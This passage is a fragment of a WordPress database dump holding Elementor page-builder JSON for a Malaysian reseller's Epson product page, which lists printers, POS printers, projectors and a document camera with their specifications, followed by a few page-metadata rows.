tray<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e06a550\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2427 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><br><br>\\n\\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 40 ppm<\\/li>\\n \\t<li>Epson iPrint<\\/li>\\n \\t<li>Ethernet<\\/li>\\n \\t<li>4 optional cassette trays<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3432510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"75\",\"right\":\"75\",\"bottom\":\"75\",\"left\":\"75\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2428 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ecb5d15\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":\"-2\",\"bottom\":\"-2\",\"left\":\"-2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T88V-i\\u00a0<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/h4>\\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\\n<ul>\\n \\t<li>Printing speed of up to 300mm\\/second<\\/li>\\n \\t<li>20 million lines for printer mechanism<\\/li>\\n \\t<li>Up to 2 million for auto-cutter<\\/li>\\n \\t<li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li>\\n \\t<li>Control peripherals easily<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T70II\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><br \\/><br \\/><\\/h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f74e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4ede29a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/h4><p><br \\/><img class=\\\"wp-image-2431 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"175\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"7bcc969\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"561cb4c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":22},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L850 Printer\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2432 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L805 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/h4><p><br \\/>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"11bfc36\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"12\",\"right\":\"12\",\"bottom\":\"12\",\"left\":\"12\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4af8eba\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-2055<\\/strong><\\/h4><p><img class=\\\"wp-image-2434 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"646b12f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"12\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"19\",\"bottom\":\"19\",\"left\":\"19\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-2142W<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/h4>\\nEnjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.\\n<ul>\\n \\t<li>White and Colour Brightness at 4,200lm<\\/li>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>12000 hours lamp life in eco-mode<\\/li>\\n \\t<li>MHL-enabled<\\/li>\\n \\t<li>Multi-PC Projection<\\/li>\\n \\t<li>Horizontal Keystone Slider<\\/li>\\n \\t<li>Miracast<sup>\\u00ae<\\/sup><\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><\\/center>\\n<\\/span><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-L500W\\u00a0<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/>\\n\\nThe compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.\\n<ul>\\n \\t<li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li>\\n \\t<li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li>\\n \\t<li>Laser light source of up to 20,000 hours<\\/li>\\n \\t<li>Virtually maintenance-free for optical engine life<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"16f2278\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson LightScene EV-105<\\/strong><br \\/><br \\/><\\/h4><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"3a36c38\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7dad77c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b7207fe\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"466ac31\",\"elType\":\"widget\",\"settings\":{\"title\":\"ULTRA PORTABLE\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-1785W\\u00a0<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2438 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"238\\\" height=\\\"177\\\" \\/>\\n\\nThe Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.\\n<ul>\\n \\t<li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>Real-Time Auto Keystone Correction<\\/li>\\n \\t<li>Split Screen Projection<\\/li>\\n \\t<li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(8026,3490,'_elementor_version','2.5.14'),(8036,3492,'_wp_page_template','template-fullwidth.php'),(8037,3492,'_elementor_edit_mode','builder'),(8038,3492,'_elementor_template_type','post');
